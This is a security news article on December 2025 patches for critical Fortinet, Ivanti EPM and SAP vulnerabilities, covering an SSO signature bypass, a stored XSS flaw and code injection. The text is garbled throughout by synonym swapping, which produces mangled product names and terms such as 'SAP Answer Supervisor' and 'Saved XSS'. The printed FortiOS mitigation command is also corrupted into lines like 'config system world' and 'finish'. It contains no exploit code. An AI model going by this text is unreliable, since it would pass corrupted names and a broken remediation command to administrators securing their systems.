Dec 10, 2025Ravie LakshmananVulnerability / Endpoint Safety
Fortinet, Ivanti, and SAP have moved to handle crucial safety flaws of their merchandise that, if efficiently exploited, might end in an authentication bypass and code execution.
The Fortinet vulnerabilities have an effect on FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager and relate to a case of improper verification of a cryptographic signature. They’re tracked as CVE-2025-59718 and CVE-2025-59719 (CVSS scores: 9.8).
“An Improper Verification of Cryptographic Signature vulnerability [CWE-347] in FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager could enable an unauthenticated attacker to bypass the FortiCloud SSO login authentication through a crafted SAML message, if that characteristic is enabled on the machine,” Fortinet stated in an advisory.
The corporate, nonetheless, famous that the FortiCloud SSO login characteristic is just not enabled within the default manufacturing unit settings. FortiCloud SSO login is enabled when an administrator registers the machine to FortiCare and has not disabled the toggle “Permit administrative login utilizing FortiCloud SSO” within the registration web page.
To quickly shield their methods in opposition to assaults exploiting these vulnerabilities, organizations are suggested to disable the FortiCloud login characteristic (if enabled) till it may be up to date. This may be accomplished in two methods –
Go to System -> Settings -> Change “Permit administrative login utilizing FortiCloud SSO” to Off
Run the under command within the CLI –
config system world
set admin-forticloud-sso-login disable
finish
Ivanti Releases Repair for Vital EPM Flaw
Ivanti has additionally shipped updates to handle 4 safety flaws in Endpoint Supervisor (EPM), certainly one of which is a crucial severity bug within the EPM core and distant consoles. The vulnerability, assigned the CVE identifier CVE-2025-10573, carries a CVSS rating of 9.6.
“Saved XSS in Ivanti Endpoint Supervisor previous to model 2024 SU4 SR1 permits a distant unauthenticated attacker to execute arbitrary JavaScript within the context of an administrator session,” Ivanti stated.
Rapid7 safety researcher Ryan Emmons, who found and reported the shortcoming on August 15, 2025, stated it permits an attacker with unauthenticated entry to the first EPM net service to hitch faux managed endpoints to the EPM server in order to poison the administrator net dashboard with malicious JavaScript.
“When an Ivanti EPM administrator views one of many poisoned dashboard interfaces throughout regular utilization, that passive person interplay will set off client-side JavaScript execution, ensuing within the attacker gaining management of the administrator’s session,” Emmons stated.
The corporate famous that person interplay is required to use the flaw and that it is not conscious of any assaults within the wild. It has been patched in EPM model 2024 SU4 SR1.
Additionally patched in the identical model are three different high-severity vulnerabilities (CVE-2025-13659, CVE-2025-13661, and CVE-2025-13662) that might enable a distant, unauthenticated attacker to realize arbitrary code execution. CVE-2025-13662, like within the case of CVE-2025-59718 and CVE-2025-59719, stems from improper verification of cryptographic signatures within the patch administration element.
SAP Fixes Three Vital Flaws
Lastly, SAP has pushed December safety updates to handle 14 vulnerabilities throughout a number of merchandise, together with three critical-severity flaws. They’re listed under –
CVE-2025-42880 (CVSS rating: 9.9) – A code injection vulnerability in SAP Answer Supervisor
CVE-2025-55754 (CVSS rating: 9.6) – A number of vulnerabilities in Apache Tomcat inside SAP Commerce Cloud
CVE-2025-42928 (CVSS rating: 9.1) – A deserialization vulnerability in SAP jConnect SDK for Sybase Adaptive Server Enterprise (ASE)
Boston-based SAP safety platform Onapsis has been credited with reporting CVE-2025-42880 and CVE-2025-42928. The corporate stated it recognized a remote-enabled operate module in SAP Answer Supervisor that allows an authenticated attacker to inject arbitrary code.
“Given the central function of SAP Answer Supervisor within the SAP system panorama, we strongly advocate a well timed patch,” Onapsis safety researcher Thomas Fritsch stated.
CVE-2025-42928, then again, permits for distant code execution by offering specifically crafted enter to the SAP jConnect SDK element. Nonetheless, a profitable exploitation requires elevated privileges.
With safety vulnerabilities in Fortinet, Ivanti, and SAP’s software program steadily exploited by dangerous actors, it is important that customers transfer shortly to use the fixes.
